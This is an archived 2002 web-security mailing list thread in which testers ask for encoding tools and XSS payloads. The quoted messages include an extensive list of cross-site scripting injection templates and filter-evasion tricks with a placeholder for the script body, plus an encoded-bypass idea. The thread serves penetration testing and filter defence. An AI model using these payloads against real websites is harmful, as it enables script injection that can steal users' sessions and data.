WebApp Sec mailing list archives
Re: encoder
From: "Kevin Spett" <kspett () spidynamics com>
Date: Thu, 19 Dec 2002 17:42:26 -0500
You can also probably set up one of the many proxy-based tools (Spike, WebProxy, Achilles, etc) to do regex replacing for it automatically, or hack it in yourself if you're handy with code. WebInspect has tools to automatically do this stuff too, if you don't mind a commercial solution. (Free trial at http://www.spidynamics.com/) Kevin Spett SPI Labs http://www.spidynamics.com/ ----- Original Message ----- From: "N30" <n30_lists () hotmail com> To: <webappsec () securityfocus com> Sent: Thursday, December 19, 2002 5:10 PM Subject: encoder
Hi group, Any links/resources/scripts to conver ASCII characters to unicode / html encode /double decode? Testing web apps for XSS & SQL injections, a lot of times, sites filter
out
<> but forget to filter encoded versions of <>. Thanks in advance -N ---- Original Message ----- From: "Tomas" <tomasg () extra lt> To: <webappsec () securityfocus com> Sent: Monday, December 16, 2002 3:42 AM Subject: Re: XSS StringsHi. here are some more examples: <a href="javascript#[code]"> <div onmouseover="[code]"> <img src="javascript:[code]"> <img dynsrc="javascript:[code]"> [IE] <input type="image" dynsrc="javascript:[code]"> [IE] <bgsound src="javascript:[code]"> [IE] &<script>[code]</script> &{[code]}; [N4] <img src=&{[code]};> [N4] <link rel="stylesheet" href="javascript:[code]"> <iframe src="vbscript:[code]"> [IE] <img src="mocha:[code]"> [N4] <img src="livescript:[code]"> [N4] <a href="about:<script>[code]</script>"> <meta http-equiv="refresh" content="0;url=javascript:[code]"> <body onload="[code]"> <div style="background-image: url(javascript:[code]);"> <div style="behaviour: url([link to code]);"> [IE] <div style="binding: url([link to code]);"> [Mozilla] <div style="width: expression([code]);"> [IE] <style type="text/javascript">[code]</style> [N4] <object classid="clsid:..." codebase="javascript:[code]"> [IE] <style><!--</style><script>[code]//--></script> <![CDATA[<!--]]><script>[code]//--></script> <!-- -- --><script>[code]</script><!-- -- --> <<script>[code]</script> <img src="blah"onmouseover="[code]"> <img src="blah>" onmouseover="[code]"> <xml src="javascript:[code]"> <xml id="X"><a><b><script>[code]</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera] Tomas ----- Original Message ----- From: <securityarchitect () hush com> To: <webappsec () securityfocus com> Sent: Monday, December 16, 2002 9:54 AM Subject: XSS StringsDoes anyone have a good list of payloads that will cover the majority
of
the options ?
Current thread:
- XSS Strings securityarchitect (Dec 16)
- Re: XSS Strings Martin Eiszner (Dec 16)
- Re: XSS Strings Jeroen Latour (Dec 16)
- RE: XSS Strings Glyn (Dec 16)
- Re: XSS Strings Tomas (Dec 16)
- encoder N30 (Dec 19)
- Re: encoder Kevin Spett (Dec 19)
- encoder N30 (Dec 19)